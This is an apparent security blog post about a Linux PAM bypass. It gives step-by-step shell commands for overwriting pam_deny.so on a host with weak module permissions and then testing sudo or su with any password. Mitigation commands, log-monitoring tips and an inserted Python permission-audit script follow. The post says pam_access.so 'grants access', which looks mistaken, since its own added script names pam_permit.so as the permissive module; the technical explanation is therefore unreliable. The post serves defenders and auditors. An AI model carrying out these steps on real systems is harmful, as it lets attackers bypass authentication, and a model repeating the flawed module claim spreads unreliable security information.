Pluggable Authentication Modules (PAM) is a critical framework in Unix-like systems that handles authentication tasks such as password verification, session management, and access control. A misconfigured PAM setup can lead to severe security vulnerabilities, allowing attackers to bypass authentication mechanisms entirely.
The PAM Degradation Attack
This attack exploits weak file permissions on PAM modules: `pam_deny.so` (which denies access) is overwritten with a copy of `pam_access.so` (which grants access). Once that is done, every authentication attempt, with a correct or an incorrect password, results in access being granted.
Exploit Steps:
1. Locate PAM Modules:

```sh
ls /lib/x86_64-linux-gnu/security/   # common path for PAM modules
```

2. Check Permissions:

```sh
ls -la /lib/x86_64-linux-gnu/security/pam_deny.so
```

If permissions are misconfigured (e.g., world-writable), proceed.

3. Replace `pam_deny.so` with `pam_access.so`:

```sh
cp /lib/x86_64-linux-gnu/security/pam_access.so /lib/x86_64-linux-gnu/security/pam_deny.so
```

4. Verify Exploit:

Attempt to `sudo` or `su` with any password; access should be granted regardless.
Mitigation Steps:
- Restrict PAM Module Permissions:

```sh
chmod 644 /lib/x86_64-linux-gnu/security/*.so
chown root:root /lib/x86_64-linux-gnu/security/*.so
```

- Use `chattr` to Prevent Modification:

```sh
sudo chattr +i /lib/x86_64-linux-gnu/security/pam_deny.so
```

- Audit PAM Configurations:

```sh
grep -r "pam_deny.so" /etc/pam.d/
```
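The audit the mitigation steps call for, as an added example that is not part of the original post: a Python script that checks a PAM module directory for a group/world-writable directory or module file, non-root ownership, symlinked modules, and a `pam_deny.so` whose bytes match `pam_access.so` or `pam_permit.so` (the stock always-succeed module), which is the sign that it has been replaced. The function name `audit_pam_dir` and the `demo()` fixture, which builds fake modules in a temporary directory instead of touching `/lib/x86_64-linux-gnu/security/`, are this example's own.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# If pam_deny.so is byte-identical to one of these, it has been swapped out.
PERMISSIVE_MODULES = ("pam_access.so", "pam_permit.so")

def _sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit_pam_dir(module_dir: str, require_root: bool = True) -> list:
    """Return findings as strings; an empty list means nothing was flagged."""
    base, findings = Path(module_dir), []
    dir_mode = stat.S_IMODE(base.stat().st_mode)
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH):  # writable dir: files replaceable
        findings.append(f"{base}: directory is group/world writable ({dir_mode:04o})")
    for path in sorted(base.glob("*.so")):
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):  # a symlink can point at any other module
            findings.append(f"{path.name}: symlink -> {os.readlink(path)}")
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{path.name}: group/world writable ({mode:04o})")
        if require_root and (st.st_uid != 0 or st.st_gid != 0):
            findings.append(f"{path.name}: owner {st.st_uid}:{st.st_gid} is not root:root")
    deny = base / "pam_deny.so"
    if not deny.is_file():
        findings.append("pam_deny.so: missing")
        return findings
    for name in PERMISSIVE_MODULES:
        other = base / name
        if other.is_file() and _sha256(other) == _sha256(deny):
            findings.append(f"pam_deny.so: identical to {name} (module replaced)")
    return findings

def demo() -> tuple:
    """Constructed fixture (no real PAM files): a weakened layout beside a sound one."""
    with tempfile.TemporaryDirectory() as tmp:
        weak, sound = Path(tmp, "weak"), Path(tmp, "sound")
        for d, deny_body in ((weak, b"fake access module"), (sound, b"fake deny module")):
            d.mkdir(mode=0o755)
            for name, body in (("pam_access.so", b"fake access module"), ("pam_deny.so", deny_body)):
                (d / name).write_bytes(body)
                (d / name).chmod(0o644)
        (weak / "pam_deny.so").chmod(0o666)  # world-writable, as in the attack above
        return (audit_pam_dir(str(weak), require_root=False),
                audit_pam_dir(str(sound), require_root=False))
```

On a live host run `audit_pam_dir("/lib/x86_64-linux-gnu/security")` as root so the root:root ownership check applies; any non-empty result deserves a look.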
You Should Know:
- PAM Configuration Files: Located in `/etc/pam.d/`, these define authentication policies.
- Common PAM Modules:
  – `pam_unix.so` – Standard Unix authentication.
  – `pam_cracklib.so` – Password strength enforcement.
  – `pam_tally2.so` – Account lockout after failed attempts.
- Logging PAM Events:

```sh
tail -f /var/log/auth.log   # Debian/Ubuntu
tail -f /var/log/secure     # RHEL/CentOS
```
What Undercode Say:
PAM-based attacks are dangerous because they don’t require system reboots or physical access. System administrators must:
– Regularly audit PAM file permissions.
– Use immutable flags (`chattr +i`) on critical modules.
– Monitor authentication logs for unusual activity.
– Implement multi-factor authentication (MFA) where possible.
Expected Output:
A compromised system where any incorrect password grants access due to `pam_deny.so` being replaced. Always test in a controlled lab environment.
Prediction:
As Linux remains a dominant server OS, PAM misconfigurations will continue to be a prime target for privilege escalation attacks. Automation tools like Ansible and Puppet should enforce strict PAM permissions to prevent such exploits.
References:
Reported By: Flarexes Bypass – Hackers Feeds